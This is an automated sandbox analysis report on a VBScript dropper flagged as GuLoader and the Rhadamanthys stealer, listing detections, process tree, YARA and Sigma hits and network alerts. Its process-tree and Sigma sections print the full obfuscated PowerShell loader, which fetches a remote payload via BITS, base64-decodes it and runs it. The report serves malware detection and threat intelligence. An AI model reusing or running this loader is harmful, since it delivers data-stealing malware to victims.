Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tmkSAOF3GM.vbs

Overview

General Information

Sample name:tmkSAOF3GM.vbs
renamed because original name is a hash value
Original sample name:25a284f3b492b1ef2573a114972267914935fdd0970888c32e96bdf2f5cf132f.vbs
Analysis ID:1578212
MD5:3b95d9711bf763678d21b1bdaacc2981
SHA1:0ba3540093886e7f97d41bcd0991f24e7c7853ed
SHA256:25a284f3b492b1ef2573a114972267914935fdd0970888c32e96bdf2f5cf132f
Tags:vbsuser-JAMESWT_MHT
Infos:

Detection

GuLoader, RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7636 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\tmkSAOF3GM.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7728 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Opinions ($Sold){For($Peder=7; $Peder -lt $Sold.Length-1; $Peder+=8){ $Becifr20+=$Sold.Substring($Peder, 1);}$Becifr20;}$Becifr2001=Opinions 'Udkonkuirecomple ChilidxClubbin ';$Becifr2002=Opinions 'MetreneTSkryderrFokusera Nonappn BuckarsAldehydfCitatioe StupidrTrykkerrFollicuiForkontn Inddelg Ghostl ';function Folkemund ($Kvke){& ($Becifr2001) ($Kvke);}$Eksped=Opinions ' Splitfhhighbrot QuerimtMyrsiphpAymissasTrilloe:Hjemmeh/ Artens/Crescogwbevogtew UnpanewTristra. Vokslya GodkensbedeviltErgograeFiligranPlanlgntEmhtteoeDennisgrHuldsagpNiveauorInsectoiValentisInspmiseRrigeresFudderl.Infantec SkabekoHeliconmSkillev.Raderinp MaaneskUpaavir/Starkesm KolonisAlungar/ BabkasNBastideoFoedselnIndtgtsn Atombo2svogers1 Duelbe5aabenhe.MetrummpPapirperDesignlmWorsset ';$Becifr2000=Opinions 'Buldogg$PsychoagSaxofonl ThrobloAfhuggcbTrichopa Roduddl Bighte:UnthroaT EmbrasaLissomncKeglestktombololSolutioe OverrosTjenestsKvllereeErklaer2 Pastic2Tilsprg1Ohmensd8Afsvkke Hmskoen=Diacety PrivateSBeneceptPentaplaHvedomrrMerotomtReserve-ReductiBReautheiMegaloctAffixiasFinlndeTushabtirIntrabraKompagnnMaimonisKavalerfSekundoeOcotillrPatrulj Daadyre-OutdegrSMindedioSteropeuEnnoblerproportcFornrmee Gaases Inhomog$TripennEGelatinkParoxyssLommenspGropedoePilenhjdMonopol mellemm-PastoraDBrndboreForfrersUnderfotHurtigri geissonFlabbieaPeculiatUnfeliniMusicaloFeminolnVuggevi Engarba$TekstreTBolsjevaFilmfrocFlinchekWindsurlGumpekaeCustomisSvirrefsOprikkee Datako2Svingni2 System1Gracise2 Memora ';Folkemund (Opinions 'Oliearb$ThermotgSvindlelAffatteoBlgenexbParadigaMrkbarelDelouse: KvindeTBivognra Pectinc NonbudkBiindtglPlanisheCryptocsOvervinsBootstreTelangi2svejser2Notewis1Omstnin2Fugleko=Mandler$MurkroneVenskabnStandarvDemenss:KladdebaSpiritup HdersppBandernd Cybelea FrisketOscularaElkhorn ') ;Folkemund (Opinions 'VespertICanamoam Podophp RaketvoPorionsrForstant dimnaf- SprayeMBevrtnioProgramdTrepaneuBesiegelBygninge Fodred HematocB CoupeeiStambortDameskrsCartogrTHawsepirTyvekroa SkrivenFlaadeos Metrecf Serrate Sluknirhypochn ') ;$Tacklesse2212=$Tacklesse2212+'\Inte.reg' ;Folkemund (Opinions ' Swazil$LivligegCyclohel Dartleo Paternb thengeasorehealpolrtch:BoligmiTDecolouaRevanchcNonconfkFormatklIvorineeCoactivs NailapsHerediteMoorman2Sagvold2Hertugd1Langtur7Otectom=Eventua(HeterogTPikakefenydannesUdmajnitUndlade-UltramaPWarlockaNymphomtVerdenehCricket Concept$FagbevgT AcetaraAmminoscheniquekRegnefulUninvadeKonfliksEnchases BestaneInflowe2Potrero2 Satsbi1rillsto2Grafolo)Beholde ') ;while (-not $Tacklesse2217) {Folkemund (Opinions 'HaandboI KehoeifOntocyc Parachu( Fortst$GuisardTPrimtalaSammenscGrittedkAkademilWitnessesynanthsPantheisBegramseDagtyve2ludebro2Mostere1Vejledn8Henlgge.HestehaJBarselsoDscommub TrgrnoSOmsadlitfishetkalevittet Interseridicul Impossi- DecubieargumenqForeskr Kontrol$BraseneBMaglemoeHyppigecTeodiczi KuskecfAllehelrLeguage2 Taksig0Kakotop0 anaest2 Period)Seychel Aggradi{FootlogS Bungfut NonzooaTrivialrFabrikatKlenodi- LugginSPerfidilHenfaldeKlerneie MoorwopJordemo Nonsema1Salderi} PreindeKrabberlTeckpresUpsoarseFarmace{MeierunSWolfwartKlovsyga Archbir TyroletSmoothi- UnrebuSChelatilObjektoeSpisesieNemophipKalfakt Hypers1Plodder;FiddlewFAntiboyoMycenaelProtamik AseptieMonumenmHeteronu SnittenBuksestdLseprve yngstee$ TriumfB MilligeYversprchandfasiHastedufPragmatr Trisom2Pilgrim0 Mycolo0 Nonatr0 Behjlp}Stmaale ');Folkemund (Opinions ' Plushe$SurvivegEngraphlOldsteroorchidobConvinca ReplialReolplj:EscalieTColouriaShovelscforankrk DagvoglSthamreeKonjunksencrownsOversaeeCuddies2 Unmagi2Unsquan1Krydder7Revampm=Trollys( OveratTSpringteVaadeousBakkanatGaugepa-DevilkiPPenworkaIsafklntEliderehInfekti Mistelt$BoldosrTBaalishaKlistricPorophykforlystlGaldesteImmunotsOpsamlisSummerseAlannah2Chorioa2 Avissp1Accepte2Biparti)Feather ') ;}Folkemund (Opinions 'Cannone$spectacg snydetl VendekoArmbaanbGaasejnaCalvarilHydraul:CystatrPBromomeo PrintesPraestctNdstilft Emusif Henrykk= Izarsi OverchaGdelthyre CarcantSagsbeh-KingstoCRevereno AgglutnSkippabtGenskabe PimpernFunctiotMarnasr revanch$ProvisoT KulsyraAvislsncFrugtesk Flgelil BetonkeFluevgts BocegesTransfee Afstrm2Replice2sedimen1Kontrol2 Elonga ');Folkemund (Opinions 'Sidstfd$OverhrtgClaimanl RuddygoStinksvb HjlpesaKnoklerlElectro:NellisfD GribaniGrundlngDemijohtIndaandeRefinag Unseeab=Hairspr Thymel[SlantinSFkalvulyTiggergsFremstitMonograeDatamaemFeeblen.StentorCMaudlinoAfsindinlimpindvArrogate KaraktrOverclotSubfree]Settsma:Antever: heubleFCaricesrZooplasoJivaranmLakersnB ContriaKvrulansLandskaeUdflytt6Afskdpr4RostbfeSUfuldkot SmudgirombetrkinonpondnJuncosggslappel(Hemagog$OvermtnPNondilaoJardinesforcedntMartyrotBrnepsy) Indlae ');Folkemund (Opinions 'Ragende$Strejkeg SkreknlEsophagoConfronbBlasfema GynaeclUnavngi:ForholdBUdmeldeebrikvvncFilingfiSubiintfMetempirBrabant2Aaregan0Indoktr2 nedfal Dyretm=Tvangsf Teagle[PoutfulSBroddedyBespndisNurturetEquiforemetachrmLausann.ghuzostTprodukteDesistmxEkkoerst Hvedem.MelismaEIvrksatn KvikkecOverwovoMunitiod Lommesi Paalgsn StrandgFjordmu] Nonacc:Miswors: ergonoA crozehSSlgternC FravleIGrshoppI Afvikl.AppretuGAnimateeVandalit SlubbiSLreansttublufrdr NobatciBanemrknUntimelgMinuetd(Paleoli$HousewrDAssisteiDipleurgAnekdottEtuastye Skille)Amorinl ');Folkemund (Opinions ' Unprot$kraftfugLumperal LexigroUnavngibProfittaAfsindilNictate:NoniehvBTropsveeBenzoxacrickraciSempitefAutopsyrMarskal2Elefant0Forsoeg3Outtopp= Skrppe$YpperhiBSceptereRailerscKreditfiUndervifKbstadsrSpitchc2 Borgen0sprutte2Deanthr.FuturumsRoesukkuTikronebReversisOvervaat Periscr Masteri Bankopn MetalkgHildrel(Digamis2 Alling9Embryol0 Indsti0Bombaze3Eleuthe0 Conque,Inquest2 Brndgl3 Maalea7Mausole4Seriefo5Benpibe)Kostsko ');Folkemund $Becifr203;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8112 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Opinions ($Sold){For($Peder=7; $Peder -lt $Sold.Length-1; $Peder+=8){ $Becifr20+=$Sold.Substring($Peder, 1);}$Becifr20;}$Becifr2001=Opinions 'Udkonkuirecomple ChilidxClubbin ';$Becifr2002=Opinions 'MetreneTSkryderrFokusera Nonappn BuckarsAldehydfCitatioe StupidrTrykkerrFollicuiForkontn Inddelg Ghostl ';function Folkemund ($Kvke){& ($Becifr2001) ($Kvke);}$Eksped=Opinions ' Splitfhhighbrot QuerimtMyrsiphpAymissasTrilloe:Hjemmeh/ Artens/Crescogwbevogtew UnpanewTristra. Vokslya GodkensbedeviltErgograeFiligranPlanlgntEmhtteoeDennisgrHuldsagpNiveauorInsectoiValentisInspmiseRrigeresFudderl.Infantec SkabekoHeliconmSkillev.Raderinp MaaneskUpaavir/Starkesm KolonisAlungar/ BabkasNBastideoFoedselnIndtgtsn Atombo2svogers1 Duelbe5aabenhe.MetrummpPapirperDesignlmWorsset ';$Becifr2000=Opinions 'Buldogg$PsychoagSaxofonl ThrobloAfhuggcbTrichopa Roduddl Bighte:UnthroaT EmbrasaLissomncKeglestktombololSolutioe OverrosTjenestsKvllereeErklaer2 Pastic2Tilsprg1Ohmensd8Afsvkke Hmskoen=Diacety PrivateSBeneceptPentaplaHvedomrrMerotomtReserve-ReductiBReautheiMegaloctAffixiasFinlndeTushabtirIntrabraKompagnnMaimonisKavalerfSekundoeOcotillrPatrulj Daadyre-OutdegrSMindedioSteropeuEnnoblerproportcFornrmee Gaases Inhomog$TripennEGelatinkParoxyssLommenspGropedoePilenhjdMonopol mellemm-PastoraDBrndboreForfrersUnderfotHurtigri geissonFlabbieaPeculiatUnfeliniMusicaloFeminolnVuggevi Engarba$TekstreTBolsjevaFilmfrocFlinchekWindsurlGumpekaeCustomisSvirrefsOprikkee Datako2Svingni2 System1Gracise2 Memora ';Folkemund (Opinions 'Oliearb$ThermotgSvindlelAffatteoBlgenexbParadigaMrkbarelDelouse: KvindeTBivognra Pectinc NonbudkBiindtglPlanisheCryptocsOvervinsBootstreTelangi2svejser2Notewis1Omstnin2Fugleko=Mandler$MurkroneVenskabnStandarvDemenss:KladdebaSpiritup HdersppBandernd Cybelea FrisketOscularaElkhorn ') ;Folkemund (Opinions 'VespertICanamoam Podophp RaketvoPorionsrForstant dimnaf- SprayeMBevrtnioProgramdTrepaneuBesiegelBygninge Fodred HematocB CoupeeiStambortDameskrsCartogrTHawsepirTyvekroa SkrivenFlaadeos Metrecf Serrate Sluknirhypochn ') ;$Tacklesse2212=$Tacklesse2212+'\Inte.reg' ;Folkemund (Opinions ' Swazil$LivligegCyclohel Dartleo Paternb thengeasorehealpolrtch:BoligmiTDecolouaRevanchcNonconfkFormatklIvorineeCoactivs NailapsHerediteMoorman2Sagvold2Hertugd1Langtur7Otectom=Eventua(HeterogTPikakefenydannesUdmajnitUndlade-UltramaPWarlockaNymphomtVerdenehCricket Concept$FagbevgT AcetaraAmminoscheniquekRegnefulUninvadeKonfliksEnchases BestaneInflowe2Potrero2 Satsbi1rillsto2Grafolo)Beholde ') ;while (-not $Tacklesse2217) {Folkemund (Opinions 'HaandboI KehoeifOntocyc Parachu( Fortst$GuisardTPrimtalaSammenscGrittedkAkademilWitnessesynanthsPantheisBegramseDagtyve2ludebro2Mostere1Vejledn8Henlgge.HestehaJBarselsoDscommub TrgrnoSOmsadlitfishetkalevittet Interseridicul Impossi- DecubieargumenqForeskr Kontrol$BraseneBMaglemoeHyppigecTeodiczi KuskecfAllehelrLeguage2 Taksig0Kakotop0 anaest2 Period)Seychel Aggradi{FootlogS Bungfut NonzooaTrivialrFabrikatKlenodi- LugginSPerfidilHenfaldeKlerneie MoorwopJordemo Nonsema1Salderi} PreindeKrabberlTeckpresUpsoarseFarmace{MeierunSWolfwartKlovsyga Archbir TyroletSmoothi- UnrebuSChelatilObjektoeSpisesieNemophipKalfakt Hypers1Plodder;FiddlewFAntiboyoMycenaelProtamik AseptieMonumenmHeteronu SnittenBuksestdLseprve yngstee$ TriumfB MilligeYversprchandfasiHastedufPragmatr Trisom2Pilgrim0 Mycolo0 Nonatr0 Behjlp}Stmaale ');Folkemund (Opinions ' Plushe$SurvivegEngraphlOldsteroorchidobConvinca ReplialReolplj:EscalieTColouriaShovelscforankrk DagvoglSthamreeKonjunksencrownsOversaeeCuddies2 Unmagi2Unsquan1Krydder7Revampm=Trollys( OveratTSpringteVaadeousBakkanatGaugepa-DevilkiPPenworkaIsafklntEliderehInfekti Mistelt$BoldosrTBaalishaKlistricPorophykforlystlGaldesteImmunotsOpsamlisSummerseAlannah2Chorioa2 Avissp1Accepte2Biparti)Feather ') ;}Folkemund (Opinions 'Cannone$spectacg snydetl VendekoArmbaanbGaasejnaCalvarilHydraul:CystatrPBromomeo PrintesPraestctNdstilft Emusif Henrykk= Izarsi OverchaGdelthyre CarcantSagsbeh-KingstoCRevereno AgglutnSkippabtGenskabe PimpernFunctiotMarnasr revanch$ProvisoT KulsyraAvislsncFrugtesk Flgelil BetonkeFluevgts BocegesTransfee Afstrm2Replice2sedimen1Kontrol2 Elonga ');Folkemund (Opinions 'Sidstfd$OverhrtgClaimanl RuddygoStinksvb HjlpesaKnoklerlElectro:NellisfD GribaniGrundlngDemijohtIndaandeRefinag Unseeab=Hairspr Thymel[SlantinSFkalvulyTiggergsFremstitMonograeDatamaemFeeblen.StentorCMaudlinoAfsindinlimpindvArrogate KaraktrOverclotSubfree]Settsma:Antever: heubleFCaricesrZooplasoJivaranmLakersnB ContriaKvrulansLandskaeUdflytt6Afskdpr4RostbfeSUfuldkot SmudgirombetrkinonpondnJuncosggslappel(Hemagog$OvermtnPNondilaoJardinesforcedntMartyrotBrnepsy) Indlae ');Folkemund (Opinions 'Ragende$Strejkeg SkreknlEsophagoConfronbBlasfema GynaeclUnavngi:ForholdBUdmeldeebrikvvncFilingfiSubiintfMetempirBrabant2Aaregan0Indoktr2 nedfal Dyretm=Tvangsf Teagle[PoutfulSBroddedyBespndisNurturetEquiforemetachrmLausann.ghuzostTprodukteDesistmxEkkoerst Hvedem.MelismaEIvrksatn KvikkecOverwovoMunitiod Lommesi Paalgsn StrandgFjordmu] Nonacc:Miswors: ergonoA crozehSSlgternC FravleIGrshoppI Afvikl.AppretuGAnimateeVandalit SlubbiSLreansttublufrdr NobatciBanemrknUntimelgMinuetd(Paleoli$HousewrDAssisteiDipleurgAnekdottEtuastye Skille)Amorinl ');Folkemund (Opinions ' Unprot$kraftfugLumperal LexigroUnavngibProfittaAfsindilNictate:NoniehvBTropsveeBenzoxacrickraciSempitefAutopsyrMarskal2Elefant0Forsoeg3Outtopp= Skrppe$YpperhiBSceptereRailerscKreditfiUndervifKbstadsrSpitchc2 Borgen0sprutte2Deanthr.FuturumsRoesukkuTikronebReversisOvervaat Periscr Masteri Bankopn MetalkgHildrel(Digamis2 Alling9Embryol0 Indsti0Bombaze3Eleuthe0 Conque,Inquest2 Brndgl3 Maalea7Mausole4Seriefo5Benpibe)Kostsko ');Folkemund $Becifr203;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • wab.exe (PID: 6344 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • dialer.exe (PID: 7640 cmdline: "C:\Windows\system32\dialer.exe" MD5: E4BD77FB64DDE78F1A95ECE09F6A9B85)
  • svchost.exe (PID: 7896 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000003.1761896364.0000000003010000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    00000006.00000002.1744049696.0000000009D30000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      0000000A.00000003.1835517097.0000000005501000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
        0000000A.00000003.1764322214.0000000005380000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          0000000A.00000003.1764142605.0000000005160000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            10.3.dialer.exe.5380000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              10.3.dialer.exe.5160000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                8.3.wab.exe.245b0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  8.3.wab.exe.247d0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    10.3.dialer.exe.5380000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

                      Other

                      SourceRuleDescriptionAuthorStrings
                      amsi32_8112.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                      • 0xe0ab:$b2: ::FromBase64String(
                      • 0xcecf:$s1: -join
                      • 0x667b:$s4: +=
                      • 0x673d:$s4: +=
                      • 0xa964:$s4: +=
                      • 0xca81:$s4: +=
                      • 0xcd6b:$s4: +=
                      • 0xceb1:$s4: +=
                      • 0x15bf4:$s4: +=
                      • 0x15c74:$s4: +=
                      • 0x15d3a:$s4: +=
                      • 0x15dba:$s4: +=
                      • 0x15f90:$s4: +=
                      • 0x16014:$s4: +=
                      • 0xd926:$e4: Get-WmiObject
                      • 0xdb15:$e4: Get-Process
                      • 0xdb6d:$e4: Start-Process
                      • 0x14728:$e4: Get-Process

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\tmkSAOF3GM.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\tmkSAOF3GM.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\tmkSAOF3GM.vbs", ProcessId: 7636, ProcessName: wscript.exe
                      Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\dialer.exe", CommandLine: "C:\Windows\system32\dialer.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\dialer.exe, NewProcessName: C:\Windows\SysWOW64\dialer.exe, OriginalFileName: C:\Windows\SysWOW64\dialer.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 6344, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\system32\dialer.exe", ProcessId: 7640, ProcessName: dialer.exe
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\tmkSAOF3GM.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\tmkSAOF3GM.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\tmkSAOF3GM.vbs", ProcessId: 7636, ProcessName: wscript.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Opinions ($Sold){For($Peder=7; $Peder -lt $Sold.Length-1; $Peder+=8){ $Becifr20+=$Sold.Substring($Peder, 1);}$Becifr20;}$Becifr2001=Opinions 'Udkonkuirecomple ChilidxClubbin ';$Becifr2002=Opinions 'MetreneTSkryderrFokusera Nonappn BuckarsAldehydfCitatioe StupidrTrykkerrFollicuiForkontn Inddelg Ghostl ';function Folkemund ($Kvke){& ($Becifr2001) ($Kvke);}$Eksped=Opinions ' Splitfhhighbrot QuerimtMyrsiphpAymissasTrilloe:Hjemmeh/ Artens/Crescogwbevogtew UnpanewTristra. Vokslya GodkensbedeviltErgograeFiligranPlanlgntEmhtteoeDennisgrHuldsagpNiveauorInsectoiValentisInspmiseRrigeresFudderl.Infantec SkabekoHeliconmSkillev.Raderinp MaaneskUpaavir/Starkesm KolonisAlungar/ BabkasNBastideoFoedselnIndtgtsn Atombo2svogers1 Duelbe5aabenhe.MetrummpPapirperDesignlmWorsset ';$Becifr2000=Opinions 'Buldogg$PsychoagSaxofonl ThrobloAfhuggcbTrichopa Roduddl Bighte:UnthroaT EmbrasaLissomncKeglestktombololSolutioe OverrosTjenestsKvllereeErklaer2 Pastic2Tilsprg1Ohmensd8Afsvkke Hmskoen=Diacety PrivateSBeneceptPentaplaHvedomrrMerotomtReserve-ReductiBReautheiMegaloctAffixiasFinlndeTushabtirIntrabraKompagnnMaimonisKavalerfSekundoeOcotillrPatrulj Daadyre-OutdegrSMindedioSteropeuEnnoblerproportcFornrmee Gaases Inhomog$TripennEGelatinkParoxyssLommenspGropedoePilenhjdMonopol mellemm-PastoraDBrndboreForfrersUnderfotHurtigri geissonFlabbieaPeculiatUnfeliniMusicaloFeminolnVuggevi Engarba$TekstreTBolsjevaFilmfrocFlinchekWindsurlGumpekaeCustomisSvirrefsOprikkee Datako2Svingni2 System1Gracise2 Memora ';Folkemund (Opinions 'Oliearb$ThermotgSvindlelAffatteoBlgenexbParadigaMrkbarelDelouse: KvindeTBivognra Pectinc NonbudkBiindtglPlanisheCryptocsOvervinsBootstreTelangi2svejser2Notewis1Omstnin2Fugleko=Mandler$MurkroneVenskabnStandarvDemenss:KladdebaSpiritup HdersppBandernd Cybelea FrisketOscularaElkhorn ') ;Folkemund (Opinions 'VespertICanamoam Podophp RaketvoPorionsrForstant dimnaf- SprayeMBevrtnioProgramdTrepaneuBesiegelBygninge Fodred HematocB CoupeeiStambortDameskrsCartogrTHawsepirTyvekroa SkrivenFlaadeos Metrecf Serrate Sluknirhypochn ') ;$Tacklesse2212=$Tacklesse2212+'\Inte.reg' ;Folkemund (Opinions ' Swazil$LivligegCyclohel Dartleo Paternb thengeasorehealpolrtch:BoligmiTDecolouaRevanchcNonconfkFormatklIvorineeCoactivs NailapsHerediteMoorman2Sagvold2Hertugd1Langtur7Otectom=Eventua(HeterogTPikakefenydannesUdmajnitUndlade-UltramaPWarlockaNymphomtVerdenehCricket Concept$FagbevgT AcetaraAmminoscheniquekRegnefulUninvadeKonfliksEnchases BestaneInflowe2Potrero2 Satsbi1rillsto2Grafolo)Beholde ') ;while (-not $Tacklesse2217) {Folkemund (Opinions 'HaandboI KehoeifOntocyc Parachu( Fortst$GuisardTPrimtalaSammenscGrittedkAkademilWitnessesynanthsPantheisBegramseDagtyve2ludebro2Mostere1Vejledn8Henlgge.HestehaJBarselsoDscommub TrgrnoSOmsadlitfishetkalevittet Interseridicul Impossi- DecubieargumenqForeskr Kontrol$BraseneBMaglemoeHyppigecTeodiczi KuskecfAllehelrLeguage2 Taksig0Kakotop0 anaest2 Period)Seychel Aggradi{F
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7896, ProcessName: svchost.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-19T12:38:03.679602+010028032702Potentially Bad Traffic192.168.2.749781103.120.177.150443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: tmkSAOF3GM.vbsVirustotal: Detection: 36%Perma Link
                      Source: tmkSAOF3GM.vbsReversingLabs: Detection: 23%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.7:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 103.120.177.150:443 -> 192.168.2.7:49781 version: TLS 1.2
                      Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.1739272158.00000000085DA000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdb source: wab.exe, 00000008.00000003.1760053800.00000000245B0000.00000004.00000001.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1760156162.00000000246D0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: wab.exe, 00000008.00000003.1759301650.00000000247A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: wab.exe, 00000008.00000003.1759602090.00000000245B0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: wab.exe, 00000008.00000003.1759301650.00000000247A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb, source: powershell.exe, 00000006.00000002.1735332796.00000000076D4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: wab.exe, 00000008.00000003.1759602090.00000000245B0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1735332796.00000000076ED000.00000004.00000020.00020000.00000000.sdmp
